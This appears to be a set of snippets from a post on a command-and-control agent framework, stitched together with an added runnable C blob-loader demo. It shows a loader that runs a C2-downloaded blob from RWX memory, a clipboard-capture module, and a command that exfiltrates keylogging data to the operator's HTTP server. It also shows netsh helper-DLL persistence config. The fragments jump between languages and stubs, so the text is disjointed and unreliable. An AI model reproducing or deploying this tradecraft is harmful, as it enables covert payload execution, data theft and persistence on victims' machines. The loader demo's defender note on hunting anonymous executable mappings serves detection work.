// example pie_blob.c
// Position-independent blob: it links against nothing; every host service it
// needs (here, exit) is handed in by the loader as a function pointer.
int f1(int v, void (* exit)(int)){
    (*exit)(0);
    return v;
}
#include <stdio.h>
#include <dlfcn.h>
#include <sys/mman.h>
#include <sys/stat.h>

// Request the pie_blob module from the C2 server (transport not shown):
// pBlob is the FILE* for the downloaded blob, sb its fstat() result
// mmap executable memory (RWX: the blob is written and then run in place)
fptr = mmap(NULL, sb.st_size, PROT_READ | PROT_EXEC | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
// read the blob into memory
result = fread(fptr, 1, sb.st_size, pBlob);
// grab whatever libraries/symbols I want (or even better, just get pointers to dlsym/dlopen)
handle = dlopen(LIBC_FILE, RTLD_LAZY);
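The snippets above show the two halves of the pie_blob scheme: a blob that takes its imports as function-pointer arguments, and a loader that maps memory, copies the blob in and calls it. The following is an added, self-contained example (not code from the original post) that puts both halves in one runnable C file for x86-64 SysV Linux/macOS. The blob is a constructed 11-byte machine-code equivalent of f1 (push rbx; mov ebx,edi; xor edi,edi; call rsi; mov eax,ebx; pop rbx; ret), so no file or C2 download is needed; the exit callback is replaced by a recording stub named record_exit so the process survives the call; and the dlopen/dlsym resolution step is left out. The loader deliberately deviates from the snippet in one way: it maps RW, copies, then mprotect()s to RX, so no page is ever writable and executable at the same time. On a non-x86-64 host run_blob_demo returns -1 instead of executing foreign bytes.

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE 1
#endif
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

/* Host-provided service for the blob's "exit" slot (assumed stand-in for
 * exit(): records the call instead of terminating the process). */
static int g_exit_calls = 0;
static int g_last_exit_code = -1;

static void record_exit(int code) {
    g_exit_calls++;
    g_last_exit_code = code;
}

/* Constructed x86-64 SysV blob equivalent to f1(int v, void (*exit)(int)):
 *   53        push rbx
 *   89 fb     mov  ebx, edi     ; save v
 *   31 ff     xor  edi, edi     ; first arg = 0
 *   ff d6     call rsi          ; (*exit)(0)
 *   89 d8     mov  eax, ebx     ; return v
 *   5b        pop  rbx
 *   c3        ret
 * push rbx also re-aligns the stack to 16 bytes before the call. */
static const unsigned char pie_blob[] = {
    0x53, 0x89, 0xfb, 0x31, 0xff, 0xff, 0xd6, 0x89, 0xd8, 0x5b, 0xc3
};

typedef int (*blob_entry_t)(int v, void (*exit_fn)(int));

/* W^X loader: anonymous RW mapping, copy, then flip to RX.  Returns NULL if
 * either the mapping or the protection change fails. */
static void *load_blob(const unsigned char *buf, size_t len) {
    void *mem = mmap(NULL, len, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED)
        return NULL;
    memcpy(mem, buf, len);
    if (mprotect(mem, len, PROT_READ | PROT_EXEC) != 0) {
        munmap(mem, len);
        return NULL;
    }
    return mem;
}

static void unload_blob(void *mem, size_t len) {
    if (mem)
        munmap(mem, len);
}

/* Loads pie_blob, calls it as f1(42, record_exit) and returns 42 when the
 * blob both returned v and invoked the callback exactly once with 0.
 * Returns -1 on a non-x86-64 host or a mapping failure, -2 on a wrong result. */
int run_blob_demo(void) {
#if defined(__x86_64__)
    g_exit_calls = 0;
    g_last_exit_code = -1;
    void *mem = load_blob(pie_blob, sizeof pie_blob);
    if (!mem)
        return -1;
    blob_entry_t entry;
    memcpy(&entry, &mem, sizeof entry);   /* data pointer -> code pointer without a cast warning */
    int rc = entry(42, record_exit);
    unload_blob(mem, sizeof pie_blob);
    if (rc == 42 && g_exit_calls == 1 && g_last_exit_code == 0)
        return 42;
    return -2;
#else
    return -1;
#endif
}

int main(void) {
    int rc = run_blob_demo();
    printf("run_blob_demo -> %d (exit callback calls=%d, last code=%d)\n",
           rc, g_exit_calls, g_last_exit_code);
    return rc == 42 ? 0 : 1;
}
```

Build with `cc -o pie_loader pie_loader.c` and run; it exits 0 when the blob round-trip works. From the defender's side, the loaded blob is an anonymous mapping with no backing file, so `grep -E 'r-xp 00000000 00:00 0' /proc/<pid>/maps` (or a single RWX region, if the original mmap flags are used) is the artefact to hunt for.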
func RunCommand(message string, executor string, payloadPath string) (string, int, int) {
	if executor == "keyword" {
		switch message {
		case "stop agent":
			os.Exit(0)
		case "module":
			// do module stuff
		default:
			// do other stuff
		}
	}
	// other executors are handled below (omitted here)
	return "", 0, 0
}
module.collect.captureClipboard
#{operator.payloads}/path/to/payload/collect-windows.exe
#{operator.payloads}/path/to/payload/collect-linux
#{operator.payloads}/path/to/payload/collect-darwin
package main

import ()

var (
	ModuleName = "collect"
	// functions addressable by the agent as module.collect.<name>;
	// captureClipboard itself is implemented elsewhere in the module
	Functions = map[string]func(args []string) ([]byte, int){
		"captureClipboard": captureClipboard,
	}
	ExecFunctions = map[string]func(args string){}
)
command: |
  module.exfil.httpServer.["#{operator.http}", "#{file.T1056.001}", "#{agent.name}", "#{operator.session}"]
RunStandalone("GoCapture", "C:\\File\\Path\\To\\Capture\\into.tmp")
#include <locale>
#include <cstdlib>
#include <stdio.h>
#include <string>
#include <Windows.h>
#include "Syscalls.h"   // project header, not shown on this page

LONG GetStringRegKey(HKEY, const std::wstring&, std::wstring&, const std::wstring&);

// thread entry point; the body is not shown on this page
DWORD WINAPI RunBin(LPVOID lpParameter) {
    return 0;
}
platforms:
  windows:
    exec:
      command: 'netsh.exe add helper #{agent.location}\..\netShHelperDll.dll'
      payload: '#{operator.payloads}/persistence/netsh/netShHelperDll.dll'
    cmd:
      command: 'netsh.exe add helper #{agent.location}\..\netShHelperDll.dll'
      payload: '#{operator.payloads}/persistence/netsh/netShHelperDll.dll'